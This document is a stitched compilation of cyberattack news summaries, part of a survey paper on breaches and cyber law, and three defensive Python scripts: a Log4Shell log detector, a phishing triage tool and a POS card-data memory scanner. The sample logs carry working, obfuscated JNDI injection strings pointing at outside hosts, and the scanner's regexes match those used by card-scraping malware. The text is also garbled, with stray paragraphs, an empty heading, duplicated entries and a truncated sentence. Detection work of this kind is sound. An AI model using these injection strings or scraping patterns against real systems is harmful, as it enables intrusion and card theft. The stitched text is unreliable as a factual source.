Cyberattacks All Over The World
Under normal business circumstances, cyber attacks are an ever-increasing problem causing
trillions of dollars in losses. The war between Russia and Ukraine made matters worse,
bringing a flurry of major politically motivated cyber attacks in 2022. Here are some of the
recent cyber attacks.
In August 2022, the Russian "hacktivist" group calling itself the People's Cyber Army aimed
some 7.25 million bots at the website of Energoatom, Ukraine's state nuclear power operator,
flooding it with garbage web traffic and page requests. Online services were disrupted for a
few hours, but there was no lasting damage. The attack was part of a Russian psyops campaign
intended to stir up fear of a nuclear disaster and intimidate Europeans.
Additionally, data was destroyed on 44 servers and hundreds of computers, and the ICCO lost
35 databases holding highly confidential information about money laundering, spies, and
terrorists living abroad.
In July 2022, the Belgian government announced that three Chinese hacker groups, all known
Chinese advanced persistent threat (APT) actors, had attacked Belgian public services and
defense forces. These state-sponsored attackers steal trade secrets and intelligence. One of
them, the Soft Cell group, had deployed a new remote access trojan (RAT) in June 2022.
Hackers took over the Twitter account of the British Army in July 2022. The account's name
and photo were changed several times, and it began promoting giveaways of "Angry Apes"
non-fungible tokens (NFTs), digital art recorded on a blockchain. The army's YouTube channel
was hijacked as well: it was renamed Ark Invest and streamed interviews with Elon Musk
talking about cryptocurrency.
A DDoS attack in July 2022 blocked access to the website of the Lithuanian energy company
Ignitis Group. The company contained the attack and limited the damage with DDoS protection
services. No data was breached, but the attacks were persistent and ongoing. The pro-Russia
group Killnet claimed responsibility, framing the attack as retaliation for Lithuanian
support of Ukraine in the war with Russia.
One of the most damaging recent cyberattacks was the compromise of Microsoft Exchange
servers through a chain of zero-day vulnerabilities known as ProxyLogon. The Hafnium group
exploited them first; Microsoft learned of the flaws in January 2021 and patched them in
March 2021. Once the patches were public, other groups joined in attacking unpatched
servers, and thousands of organizations were compromised.
Tether Attack
In March 2021, cyber criminals threatened to leak documents stolen from Tether, the
stablecoin issuer. The attackers claimed the data would "harm the Bitcoin ecosystem" and
demanded around 500 Bitcoin (then about $24 million) to withhold it, but Tether refused to pay.
A ransomware attack on the insurance firm CNA Financial in March 2021 locked employees out
of their systems and corporate resources. Company data was also stolen, and CNA Financial
reportedly paid a $40 million ransom.
Facebook Cyberattack
Data of more than 530 million Facebook users, including their names, Facebook IDs, dates of
birth, and relationship status, was published online in April 2021. Facebook, now Meta, said
the information was obtained through scraping in 2019.
The growing threat that advanced cybersecurity attacks pose to the world was highlighted by
the Colonial Pipeline attack in May 2021. The fuel pipeline operator suffered a ransomware
attack launched by the DarkSide hacking group, which led to fuel disruption and mass panic
buying across the U.S.
Omiai Cyberattack
An unauthorized-access attack in May 2021 exposed data on 1.7 million users of the Japanese
dating app Omiai.
In June 2021, Audi and Volkswagen revealed a data breach had affected more than 3.3
million customers and prospective buyers, who were primarily U.S.-based. The breach was
blamed on an associated vendor, which was purportedly responsible for exposing the data
between August 2019 and May 2021.
Guntrader.uk Cyberattack
The United Kingdom’s trading website for guns and shooting equipment revealed that
records of 100,000 gun owners had been stolen and published online in July 2021. Gun
ownership is strictly controlled in the U.K., so the data breach of customers’ names and
addresses caused significant privacy and safety concerns.
T-Mobile Attack
In August 2021, telecoms firm T-Mobile suffered a cybersecurity breach that led to the data
of around 50 million existing customers and prospects being stolen. The data, which included
customer addresses, drivers' licenses, and social security numbers, was stolen by a 21-year-
old, who claimed to have obtained around 106GB of information.
AP-HP Attack
Cybersecurity attacks on medical organizations and healthcare firms are also increasing. As a
result of the hack on AP-HP, a Paris public hospital system, in September 2021, cyber
criminals stole personal data belonging to around 1.4 million people who were tested for
COVID-19 in 2020.
Cream Finance, a decentralized finance (DeFi) lending platform, was exploited through a
vulnerability in its lending market. The hack, revealed in September 2021, caused losses worth
$34 million.
A South African debt recovery company suffered a significant attack that led to client and
employee data being illegally accessed from its servers in September 2021. The incident is
suspected to have affected the personally identifiable information (PII), including owed
debts, of over 1.4 million people.
Department store Neiman Marcus suffered a data breach that resulted in the exposure and
theft of up to 3.1 million customers’ payment card details. The attack was detected in
September 2021 but began in May 2020, and most of the data stolen was believed to have
been from expired or invalid cards.
A hacker who claimed to have leaked the entire database of Argentina's National Registry of
Persons allegedly stole the data of more than 45 million Argentinian residents. The
government denied that a breach had occurred.
In November 2021, a data breach of the trading app Robinhood affected around 5 million users.
Usernames, email addresses, and phone numbers were compromised through a customer support
system.
BitMart cyberattack
Yet another cybersecurity attack against digital currencies, BitMart suffered a breach that
enabled cyber criminals to steal approximately $150 million worth of cryptocurrency in
December 2021. The attack resulted in total losses of around $200 million, including
damages.
Log4j Breach
In December 2021, a zero-day vulnerability (CVE-2021-44228, dubbed Log4Shell) was disclosed
in the widely used Log4j Java logging library. The flaw allows unauthenticated remote code
execution whenever an attacker-controlled string such as ${jndi:ldap://...} is logged, and
within days it was being exploited at scale, including by Mirai botnet variants.
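Because Log4Shell is triggered by a single lookup string in any logged field, hunting for it in web logs is a pattern-matching problem, complicated by the nested-lookup obfuscations attackers used to slip past naive signatures. The Python script below is an added example, not code from the original article or from the Log4j project: it URL-decodes each line, resolves the ${lower:}, ${upper:} and ":-" default-value tricks from the inside out, and only then matches the JNDI lookup. The access-log lines are constructed samples, and the set of obfuscations handled is an assumption drawn from public write-ups rather than an exhaustive list.

```python
import re
import urllib.parse
from typing import Optional

# Innermost ${...} lookup: no nested '$', '{' or '}' inside the braces.
_LOOKUP_RE = re.compile(r"\$\{([^${}]*)\}")

# After de-obfuscation, a JNDI lookup pointing at a remote naming service.
_JNDI_RE = re.compile(
    r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nds|http)\s*:",
    re.IGNORECASE,
)


def _resolve_lookup(body: str) -> str:
    """Approximate Log4j's resolution of one lookup so obfuscated payloads
    collapse to their plain form.  Only the tricks seen in real attacks are
    handled (assumption): ${lower:x}, ${upper:x} and the ':-' default-value
    syntax (${::-x}, ${env:NOPE:-x})."""
    prefix, _, rest = body.partition(":")
    key = prefix.strip().lower()
    if key == "jndi":
        return "${" + body + "}"          # keep it: this is what we hunt for
    if ":-" in body:
        return body.split(":-", 1)[1]     # default value wins when the lookup fails
    if key == "lower":
        return rest.lower()
    if key == "upper":
        return rest.upper()
    return "${" + body + "}"              # unknown lookup: leave as-is


def normalize(text: str, max_rounds: int = 10) -> str:
    """URL-decode (attackers also percent-encode '${') and resolve nested
    lookups from the inside out until the string stops changing."""
    for _ in range(3):                    # tolerate double encoding
        decoded = urllib.parse.unquote(text)
        if decoded == text:
            break
        text = decoded
    for _ in range(max_rounds):
        resolved = _LOOKUP_RE.sub(lambda m: _resolve_lookup(m.group(1)), text)
        if resolved == text:
            break
        text = resolved
    return text


def detect_log4shell(line: str) -> Optional[dict]:
    """Return the protocol and normalized payload if the line carries a
    JNDI lookup, else None."""
    norm = normalize(line)
    m = _JNDI_RE.search(norm)
    if not m:
        return None
    end = norm.find("}", m.end())
    payload = norm[m.start(): end + 1] if end != -1 else norm[m.start():]
    return {"protocol": m.group(1).lower(), "payload": payload}


# Constructed access-log lines (not real traffic); addresses are RFC 5737 test ranges.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:10:00:00 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.6 - - [10/Dec/2021:10:00:01 +0000] "GET / HTTP/1.1" 200 12 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.7 - - [10/Dec/2021:10:00:02 +0000] "GET / HTTP/1.1" 200 12 "-" "${${lower:j}${upper:n}di:${lower:l}dap://203.0.113.9/x}"',
    '10.0.0.8 - - [10/Dec/2021:10:00:03 +0000] "GET / HTTP/1.1" 200 12 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://203.0.113.9/y}"',
    '10.0.0.9 - - [10/Dec/2021:10:00:04 +0000] "GET /?q=%24%7Bjndi%3Adns%3A%2F%2F203.0.113.9%2Fz%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
]


def scan_log(lines):
    """Return (line_number, finding) for every line that carries a lookup."""
    hits = []
    for n, line in enumerate(lines, 1):
        hit = detect_log4shell(line)
        if hit:
            hits.append((n, hit))
    return hits


if __name__ == "__main__":
    for n, hit in scan_log(SAMPLE_LOG):
        print(f"line {n}: {hit['protocol']:5} {hit['payload']}")
```

Normalizing before matching is the point: a signature for the literal string `${jndi:` misses lines 3 and 4 above, while the resolver turns both into the plain form. The unknown-lookup branch is deliberately conservative; a lookup it cannot resolve is left in place rather than guessed, so `${jndi:ldap://x/${env:USER}}` is still detected from its outer lookup.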
Kronos Cyberattack
HR platform Kronos suffered a ransomware attack that took the Kronos Private Cloud
offline. The outage occurred shortly before Christmas and took the vital service down for
several weeks.
In August 2020, credit reporting agency Experian suffered a breach that affected 24 million
consumers in South Africa and more than 793,000 businesses. The incident occurred when an
individual who claimed to be a client requested services that prompted the data’s release. The
stolen data was eventually secured and deleted, while Experian revealed it had not been used
fraudulently and that its customer database, infrastructure, and systems had not been
compromised.
The data of more than 10.6 million customers of MGM Resorts hotels was leaked to a
hacking forum in February 2020. The data included addresses, dates of birth, email addresses,
names, and phone numbers belonging to celebrities, business executives, government
employees, and tourists.
However, the hack did not breach users’ credit card details. The incident began in mid-2019
when MGM discovered unauthorized access to its server. Another data breach followed in
February 2020, which saw user data published on an open, accessible forum.
California University Cyber Attack
The University of California, San Francisco (UCSF) suffered a ransomware attack in June 2020;
on June 1 the attackers demanded a $3 million ransom. The malware encrypted a number of the
university's servers and the critical data on them, and the attackers also claimed to have
stolen data. The university negotiated the ransom down and paid $1.14 million, but later said
no data had been compromised.
Technology and consulting firm Cognizant was hit by Maze ransomware on April 18, 2020. The
attackers stole data and threatened to publish it online unless a ransom was paid. Cognizant
later estimated that the incident would cost it between $50 million and $70 million.
Tillamook County’s IT systems were infected by encryption malware on January 22, 2020.
The attack shut down its computer and phone systems and took down the website that hosts
its various departments. Tillamook County’s computer systems were down for at least two
weeks, and attackers demanded $300,000 as settlement, which would double after two weeks,
to restore the data. The county tried to avoid paying the settlement fee but could not restore
the data and eventually settled.
WHO Attack
As the COVID-19 pandemic broke, an attack targeting the World Health Organization
(WHO) resulted in the breach of 25,000 email addresses and passwords. The data was leaked
online on April 19, 2020, along with information belonging to other groups fighting the
pandemic, including the Gates Foundation, the National Institutes of Health (NIH), and the
U.S. Centers for Disease Control and Prevention (CDC).
Videoconferencing service Zoom saw a massive increase in activity throughout 2020 with
people working from home and speaking to friends and family through the application.
However, in April 2020, a cyberattack known as Zoombombing enabled cyber criminals to
join private meetings, access conversations, and share offensive images, videos, and screens.
Zoom updated its application to enhance security levels.
A Mitsubishi Electric systems data breach resulted in around 200 MB of files being stolen.
The breach, which was first detected in June 2019 but was reported in January 2020,
contained employee and applicant information, data about retired employees from affiliate
companies, and sales and technical material. The attack was caused by a vulnerability in the
organization’s antivirus solution, which Chinese hackers exploited.
The first cyber-attack on record is generally taken to be the Morris Worm of 1988. Robert
Tappan Morris, a graduate student at Cornell University, wrote a worm intended to spread
across the internet and count how many computers were connected to it. However, a flaw in its
replication logic made it reinfect roughly one in seven machines it reached and overload them
until they crashed, which inadvertently made it the first distributed denial-of-service (DDoS)
attack. The Morris Worm damaged around 6,000 computers, then about 10% of the entire internet.
In 2002, the first internet attack as we now understand the term was a DDoS attack on the 13
Domain Name System (DNS) root servers. Had it been allowed to continue, it could have brought
the internet down, and it was then the most sophisticated and widescale cyber-attack ever
launched.
Recent cyber-attacks have advanced and can affect vast numbers of people. Single attacks
now regularly steal the data of hundreds of millions of people.
The Russia-Ukraine war, which began in February 2022, involved not only physical battles that
displaced thousands and killed many, but cyberattacks as well. FortiGuard Labs determined that
new wiper malware was used against Ukrainian targets and found it installed on at least
several hundred machines in Ukraine. Several Ukrainian organizations were also hit by
sophisticated attacks using the KillDisk and HermeticWiper malware strains, which destroy the
data on infected devices.
In addition, a remote-control tool, Remote Manipulator System (RMS), was distributed in
Ukraine via fake "Evacuation Plan" emails. Ukraine also suffered a wave of distributed
denial-of-service (DDoS) attacks, including one on the State Savings Bank that disrupted
banking services and ATM cash withdrawals, and others that disrupted Ministry of Defence and
Armed Forces networks.
In October 2013, software company Adobe disclosed a cyber-attack in which hackers stole
encrypted credit card data from nearly 3 million customers. The attackers also took the login
credentials, including usernames and encrypted passwords, of up to 150 million users, along
with customer names and identification data, and further debit and credit card records.
In May 2019, the graphic design website Canva suffered an attack that exposed email
addresses, names, cities of residence, passwords, and usernames of 137 million users.
Hackers were also able to view but not steal files that included partial payment and credit
card data.
The attackers, known as GnosticPlayers, contacted the technology news website ZDNet to
boast about the attack. They claimed to have obtained users’ open authorization (OAuth)
login tokens, which are used for logging in via Google.
Canva confirmed the attack, notified its users, and prompted them to update their passwords
and reset their OAuth tokens. But a list of 4 million Canva accounts and stolen passwords
was later shared online, which resulted in Canva having to invalidate any passwords that
remained unchanged.
Dubsmash Attack
More than 162 million users’ data—email addresses, hashed passwords, dates of birth, and
usernames—was stolen from the video messaging service Dubsmash in December 2018. A
year later, the data was made available for sale on dark web site Dream Market as part of a
dump of data that also included information from attacks on Armor Games, Coffee Meets
Bagel, MyHeritage, MyFitnessPal, and ShareThis.
Dubsmash acknowledged that its systems had been breached and the stolen data put up for
sale, and advised users to change their passwords. However, it has not reported how attackers
gained access to the data or confirmed the attack scale.
eBay Data Breach
A cyber attack in May 2014 exposed the account list of eBay’s 145 million users. The attack,
which exposed user addresses, dates of birth, names, and encrypted passwords, occurred as
hackers obtained three eBay employees’ credentials. Attackers gained complete access to the
entire eBay network for 229 days.
eBay asked customers to update their passwords, for which it received criticism over its poor
communication and password-renewal process implementation. The auction site also advised
that financial details, such as credit card information, were stored in a separate location and
had not been compromised.
The business social network LinkedIn is a common target for cyber criminals
launching social engineering attacks. It has also suffered major cyber attacks that leaked its
users’ data.
The first came in 2012, when 6.5 million hashed passwords were stolen then posted on a
Russian hacker forum. The attack’s true size was revealed four years later when a hacker was
discovered selling 165 million LinkedIn users’ email addresses and passwords for 5 bitcoins,
which were then worth around $2,000. LinkedIn acknowledged the breach and reset
passwords on all accounts that had been affected.
Slack Attack
Collaboration platform Slack was affected in 2015 when hackers gained unauthorized access
to the service’s infrastructure. This included a database storing user profile data, such as
usernames and hashed passwords. The attackers also injected code that enabled them to steal
plaintext passwords when users entered them.
Slack revealed the attack affected around 1% of its users, estimated to be around 65,000
users. It immediately reset their passwords and advised all users to reset their passwords and
implement security measures like two-factor authentication (2FA).
Four years later, a Slack bug bounty program revealed a potential compromise of Slack
credentials, which it suspected was due to malware or users recycling passwords across
online services. It subsequently realized that most of the credentials affected were from
accounts that accessed the service during the 2015 incident.
Cyber attacks on the internet services company Yahoo are widely regarded as the largest data
breaches in history. The state-sponsored attacks, which began in 2013, affected all 3 billion
of Yahoo's user accounts.
In September 2016, Yahoo revealed a 2014 attack that compromised 500 million users’
names, email addresses, telephone numbers, and birth dates. Three months later, the company
revealed a breach from 2013, which was carried out by another attacker and compromised its
users' names, email addresses, passwords, dates of birth, and security questions and answers.
Yahoo initially estimated that the 2013 attack affected 1 billion users but later changed that to
its entire user base of 3 billion people.
Zynga Attack
Games developer Zynga, which created various popular games that users accessed via
Facebook, suffered a massive cyber attack in September 2019. The attack by Pakistani hacker
group GnosticPlayers, who also claimed the Canva attack, accessed the database of Zynga
games Draw Something and Words With Friends. It compromised the email addresses,
hashed passwords, phone numbers, and Facebook and Zynga user IDs of 218 million people.
Of all of the cyber and ransomware attacks in 2021, the breach of Colonial Pipeline in late
April had the most news coverage. As Touro College Illinois Cybersecurity Program Director
Joe Giordano notes, “The Colonial Pipeline attack made such an impact because the pipeline
is an important part of the national critical infrastructure system. Taking the system down
disrupted gas supplies all along the East Coast of the United States, causing chaos and panic.”
As most Americans are directly impacted by gasoline shortages, this attack hit close to home
for many consumers. The DarkSide gang was behind the attack and targeted the firm's billing
system and internal business network, leading to widespread shortages in multiple states. To
avoid further disruption, Colonial Pipeline eventually gave in to the demands and paid the
group $4.4 million in bitcoin.
This attack was particularly dangerous because consumers panicked and ignored safety
precautions. Some East Coast residents tried to hoard gasoline in plastic bags and bins, and
one car even caught fire. After the chaos subsided, government officials confirmed that
Colonial Pipeline's cybersecurity measures were not up to par and that the attack might have
been prevented had stronger protection been in place.
Thankfully, US law enforcement was able to recover much of the $4.4 million ransom. The FBI
traced the money by monitoring cryptocurrency movements and digital wallets. Finding the
actual hackers behind the attack will prove a lot harder. (The New York Times)
Brenntag
At around the same time in early May 2021, the same notorious hacker group that targeted
Colonial Pipeline, DarkSide, also targeted Brenntag, a chemical distribution company. After
stealing 150 GB worth of data, DarkSide demanded the equivalent of $7.5 million dollars in
bitcoin.
Brenntag soon gave in and paid $4.4 million. Although that was a little more than half of the
original demand, it still stands as one of the largest ransomware payments on record. (IT
Governance)
Acer
In March 2021, the computer manufacturer Acer was attacked by the REvil group, the same group
responsible for an attack on the London foreign exchange firm Travelex. The $50 million
ransom demand stood out as the largest known to date. REvil reportedly exploited a
vulnerability in a Microsoft Exchange server to gain access to Acer's files, and leaked images
of sensitive financial documents and spreadsheets.
JBS Foods
Although spring 2021 brought hopeful news about the end of the pandemic, the surge in cyber
attacks that began in 2020 showed no sign of slowing. Another high-profile ransomware attack
hit JBS Foods, one of the biggest meat processors in the world, in May 2021. REvil, the same
Russia-based group that attacked Acer, is thought to be behind it. (CNN)
Although there were no major food shortages as a result, government officials told consumers
not to panic-buy meat. On June 10, JBS confirmed that it had paid the $11 million ransom after
consulting cybersecurity experts. The payment, made in bitcoin, is one of the largest
ransomware payments of all time. (CBS News)
Quanta
As with Acer, the REvil gang demanded a $50 million ransom from computer manufacturer Quanta
in April 2021. Although Quanta is not a household name, it is one of Apple's major suppliers.
After Quanta refused to negotiate, REvil turned on Apple instead: it leaked Apple product
blueprints obtained from Quanta and threatened to release more sensitive documents and data.
By May, REvil appeared to have called off the extortion attempt.
Organizations across all kinds of industries are targeted by ransomware. One of the more
surprising victims in 2021 was the National Basketball Association (NBA). In mid-April 2021,
the Babuk group claimed to have stolen 500 GB of confidential data about the Houston Rockets
and warned that the documents, including financial information and contracts, would be made
public if its demands were not met. At the time of writing, no ransom had been paid.
AXA
In May 2021, the European insurer AXA was attacked by the Avaddon gang. The attack came soon
after the company announced an important change to its cyber-insurance policies: AXA stated
that it would stop reimbursing many of its clients for ransomware payments. This unusual (and
somewhat ironic) attack on a cyber-insurer made headlines, and the group claimed to have
accessed 3 TB of data. (BlackFog)
CNA
Earlier in 2021, in March, another large insurer fell victim to ransomware. CNA's network was
attacked on March 21, and the attackers encrypted 15,000 devices, including many computers
belonging to employees working remotely. The attack is reportedly linked to the Evil Corp
group and used a new strain of malware called Phoenix CryptoLocker.
CD Projekt
Kaseya
REvil, the same group that targeted Acer, Quanta, and JBS Foods, made headlines again in July
2021 with an attack on Kaseya. While not a name known to most consumers, Kaseya supplies the
software that managed service providers use to run IT infrastructure for companies worldwide.
Like the attacks on Colonial Pipeline and JBS Foods, this one had the potential to disrupt
key areas of the economy on a large scale.
To carry out the attack, REvil pushed a malicious update through Kaseya's Virtual System
Administrator (VSA), which reached both Kaseya's direct customers and their downstream
clients. REvil claimed that one million systems were encrypted and held for ransom; according
to Kaseya, around 50 of its customers and around 1,000 businesses in total were affected. The
group demanded $70 million in bitcoin. To illustrate the impact, Coop, a Swedish supermarket
chain, was forced to close 800 stores for a full week. (ZDNet)
Soon after the attack, the FBI gained access to REvil's servers and obtained the decryption
keys. No ransom was paid, and Kaseya was able to restore its customers' IT infrastructure.
Although it started out as one of the biggest ransomware attacks of the year, the situation
was salvaged in the end. (ZDNet)
Although not a state-sponsored organization, the group behind the Kaseya attack is based in
Russia. According to the Associated Press, the widespread security event prompted a call
between President Biden and President Putin in July, during which Biden pressed Putin to take
a stronger stance against malicious actors in his country. Exactly what followed the call is
unclear, but the FBI gained access to REvil's servers, and REvil's website and infrastructure
went down soon after. While it is uncertain whether Biden's call made a difference, the White
House asserted that it would keep up the pressure on Russia to cooperate.
Despite the continued onslaught of ransomware attacks, there have been some hopeful
developments. In November, news broke that five suspected associates of the REvil group had
been arrested in an operation coordinated by Europol. According to Fortune.com, "the alleged
hackers are suspected of involvement in about 5,000 ransomware infections and received about
half a million Euros ($579,000) in ransom payments."
Using wiretaps and other methods, police were able to access the group's infrastructure and
track down the alleged hackers. The two most recent arrests were the result of collaboration
between 17 countries, including the U.S., U.K. and France.
Over the last decade the widespread use of computers in every sector of life has made them a
target for attackers seeking to steal data, infiltrate systems and disrupt operations. Many of
these attacks go undetected for some time before the culprits are prosecuted under the law.
Any attack that compromises one of the CIA properties (Confidentiality, Integrity and
Availability) is considered a cyberattack. Because computer systems are globally
interconnected, attackers are no longer confined to a fixed geographical location and can pick
a target from any corner of the world.
The motivations behind these cyber-attacks range from money and data theft to cyber espionage
and politics; Figure 1 shows the distribution of these motivations.
Fig. 1: Motivation behind cyberattacks [1]
This survey paper summarizes recent attacks that have taken place over the last few years and
also looks at significant cyber laws.
Cyber Attacks
Attacks on JP Morgan:
In 2014 JP Morgan discovered that it had been under attack for some months: in August it found
that attackers had been accessing its systems for the previous two to three months without
being noticed. JP Morgan reported that information on over 80 million customers had been
compromised. [6]
The attack relied on crafty spear-phishing techniques. The attackers gained privileged access
to the system, which allowed them to copy customer information without being detected.
Although they got into JP Morgan's network, they could not reach the customers' banking
systems, so customers did not lose any money.
Spear-phishing attacks lure victims into opening an attachment or link in a targeted but
innocuous-looking email. The attacker crafts the message to persuade the victim to download
malware, which the attacker can then control remotely to launch further attacks on the
victim's network.
Real-time traffic analysis, sandboxing of inbox attachments and, above all, safe user
behaviour when handling email go a long way towards curbing spear-phishing attacks.
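Several of the mail-side checks behind those controls can be expressed in code. The Python triage script below is an added example, not part of the survey paper: it parses one message with the standard library and flags the indicators a mail gateway or analyst would check first, a look-alike sender domain, a Reply-To pointing somewhere else, failed SPF/DMARC results stamped by the receiving server, and a double-extension executable attachment. The trusted domains, the sample message and the list of dangerous extensions are all assumptions made up for the example.

```python
import email
import re
from email import policy
from email.utils import parseaddr

# Assumed: the organisation's own domain and its bank (hypothetical, RFC 2606 names).
TRUSTED_DOMAINS = {"example.com", "example-bank.com"}

# Attachment types that should not arrive unsolicited from outside (assumed list).
DANGEROUS_EXT = {".exe", ".scr", ".js", ".vbs", ".hta", ".bat", ".cmd", ".ps1", ".docm", ".xlsm", ".iso", ".lnk"}

# Homoglyph folding so 'examp1e' and 'exarnple' compare equal to 'example'.
_FOLD = str.maketrans({"0": "o", "1": "l", "3": "e", "5": "s", "7": "t", "@": "a"})


def _fold(domain: str) -> str:
    return domain.lower().translate(_FOLD).replace("rn", "m").replace("vv", "w")


def _edit_distance(a: str, b: str) -> int:
    """Levenshtein distance, two-row iterative form."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike_of(domain: str, trusted=TRUSTED_DOMAINS):
    """Return the trusted domain this one impersonates, or None if it is genuine."""
    d = domain.lower()
    for t in trusted:
        if d == t or d.endswith("." + t):
            return None                      # the real domain or one of its subdomains
    for t in trusted:
        if _fold(d) == t or _edit_distance(d, t) <= 2 or t in d:
            return t                         # homoglyph, typo-squat or 'bank.com.evil.net'
    return None


def _domain(addr: str) -> str:
    return addr.rpartition("@")[2].lower()


def triage(raw: str, trusted=TRUSTED_DOMAINS) -> list:
    """Return indicator strings for one raw RFC 5322 message (empty list = nothing found)."""
    msg = email.message_from_string(raw, policy=policy.default)
    findings = []
    _, from_addr = parseaddr(str(msg.get("From", "")))
    _, reply_addr = parseaddr(str(msg.get("Reply-To", "")))
    from_dom = _domain(from_addr)

    target = lookalike_of(from_dom, trusted)
    if target:
        findings.append(f"lookalike-sender-domain:{from_dom}->{target}")
    if reply_addr and _domain(reply_addr) != from_dom:
        findings.append(f"reply-to-mismatch:{_domain(reply_addr)}")

    # Authentication-Results is stamped by our own receiving MX, so it can be trusted here.
    auth = str(msg.get("Authentication-Results", "")).lower()
    for mech in ("spf", "dkim", "dmarc"):
        m = re.search(mech + r"=(\w+)", auth)
        if m and m.group(1) in ("fail", "softfail", "permerror"):
            findings.append(f"{mech}-{m.group(1)}")

    for part in msg.iter_attachments():
        name = (part.get_filename() or "").lower()
        ext = "." + name.rsplit(".", 1)[-1] if "." in name else ""
        if ext in DANGEROUS_EXT or name.count(".") > 1:      # double-extension trick
            findings.append(f"dangerous-attachment:{name}")
    return findings


# Constructed sample message (not a real email); every address in it is made up.
CONSTRUCTED_EMAIL = """\
From: "Example Bank Security" <alerts@examp1e-bank.com>
Reply-To: verify@mail-updates.example.net
To: employee@example.com
Subject: Action required: confirm wire transfer
Authentication-Results: mx.example.com; spf=fail smtp.mailfrom=examp1e-bank.com; dkim=none; dmarc=fail
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain; charset="utf-8"

Please review the attached statement and confirm the transfer today.
--b1
Content-Type: application/octet-stream; name="Statement_Q3.pdf.exe"
Content-Disposition: attachment; filename="Statement_Q3.pdf.exe"
Content-Transfer-Encoding: base64

TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
--b1--
"""

if __name__ == "__main__":
    for finding in triage(CONSTRUCTED_EMAIL):
        print(finding)
```

None of these indicators is conclusive on its own (a legitimate newsletter often has a different Reply-To), which is why the function returns the full list rather than a verdict: a gateway would score or sandbox on the combination, and an analyst gets every reason at once.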
Attacks on Target:
In 2013 Target was breached by attackers who stole over 40 million credit card records, costing
the company over $150 million in compensation and other legal costs.
The attack was carried out through Target's point-of-sale (POS) system, which was infected with
malware that first harvested card data and then, after some days, began sending the copied
information to a staging server inside Target's network and ultimately to an FTP server
controlled by the attackers. The malware scraped the card data from memory as customers swiped
their credit or debit cards at the POS terminal. [8]
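RAM-scraping malware of the kind described above recognises cards by the ISO/IEC 7813 track layout that the terminal holds in memory for a moment after the swipe, and a defender can search a memory dump for exactly the same layout. The Python scanner below is an added example, not from the paper or from any published Target investigation: it runs over a constructed memory buffer, matches track 1 and track 2 records, and uses the Luhn check digit to discard digit runs that merely look like a card number. The two card numbers are standard, publicly documented test PANs, and the rest of the buffer is invented.

```python
import re

# ISO/IEC 7813 track formats as they appear in POS process memory.
# Track 2:  ;PAN=YYMM SSS discretionary?
# Track 1:  %B PAN ^ NAME ^ YYMM SSS discretionary?
_TRACK2_RE = re.compile(rb";(\d{13,19})=(\d{2})(\d{2})(\d{3})([^?;]{0,40}?)\?")
_TRACK1_RE = re.compile(rb"%B(\d{13,19})\^([^^]{2,26})\^(\d{2})(\d{2})(\d{3})([^?%]{0,40}?)\?")


def luhn_valid(pan: str) -> bool:
    """Luhn check digit; rejects most random digit runs that match the regex."""
    total = 0
    for i, ch in enumerate(reversed(pan)):
        d = int(ch)
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def mask_pan(pan: str) -> str:
    """Keep the BIN and last four digits, the usual PCI DSS display form."""
    return pan[:6] + "*" * (len(pan) - 10) + pan[-4:]


def scan_for_card_data(buf: bytes) -> list:
    """Return Luhn-valid track 1 / track 2 records found in a memory buffer, by offset."""
    found = []
    for m in _TRACK2_RE.finditer(buf):
        pan = m.group(1).decode()
        if luhn_valid(pan):
            found.append({"track": 2, "offset": m.start(), "pan_masked": mask_pan(pan),
                          "expiry": f"20{m.group(2).decode()}-{m.group(3).decode()}",
                          "service_code": m.group(4).decode()})
    for m in _TRACK1_RE.finditer(buf):
        pan = m.group(1).decode()
        if luhn_valid(pan):
            found.append({"track": 1, "offset": m.start(), "pan_masked": mask_pan(pan),
                          "name": m.group(2).decode(errors="replace"),
                          "expiry": f"20{m.group(3).decode()}-{m.group(4).decode()}",
                          "service_code": m.group(5).decode()})
    return sorted(found, key=lambda f: f["offset"])


# Constructed memory image (invented bytes); the PANs are public test numbers, not real cards.
CONSTRUCTED_MEMORY = (
    b"\x00\x00\x90\x90heap noise 1234567890123456 not a track record\x00"
    b";4111111111111111=25121011234567890?"              # track 2, Luhn-valid test PAN
    b"\x00\x7f"
    b";4111111111111112=25121011234567890?"              # track 2 shape, but fails Luhn
    b"\x00"
    b"%B5555555555554444^CARD/TEST^2612101000000000?"    # track 1, Luhn-valid test PAN
    b"\x00\x00"
)

if __name__ == "__main__":
    for rec in scan_for_card_data(CONSTRUCTED_MEMORY):
        print(rec)
```

The same two regexes, minus the Luhn filter, are essentially what the scraper itself runs against process memory; the defensive use differs only in that it reports masked PANs and offsets rather than exfiltrating the records, which is why a scanner like this must never write the raw track data back to disk.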
Cyber Laws:
The Gramm–Leach–Bliley Act (1999): One of the best-known laws in the financial sector, also
referred to as GLBA. It regulates how financial institutions may store, use and share customer
information with other organizations by making three conditions mandatory:
Securing personal financial information
Obtaining customers' consent before sharing their personal information with others
Giving customers the opportunity to opt out of the sharing of their information. [9]
As we can see from the above, a myriad of attacks is happening frequently, and many of them
are far from. According to a survey by the Ponemon Institute in 2013, the average annual cost
of cyberattacks to a US organization was about $11.6 million, up 26 percent from the previous
year. [11] Most of the attacks discussed above could have been prevented had better-secured
systems been in place, and some could have been avoided if users had been trained not to fall
for spear-phishing emails. That said, as more and more computers come online, more
cyberattacks will follow. Nevertheless, keeping systems patched and up to date, locking them
down properly and enabling auditing and logging can thwart attackers' efforts to a certain
extent.
References:
4. The Huffington Post (2015). Citigroup: $2.7 Million Stolen From Customers As Result Of Hacking. Retrieved 1 September 2015, from http://www.huffingtonpost.com/2011/06/27/citigroup-hack_n_885045.html
5. OWASP (2015). Session hijacking attack. Retrieved 5 September 2015, from https://www.owasp.org/index.php/Session_hijacking_attack
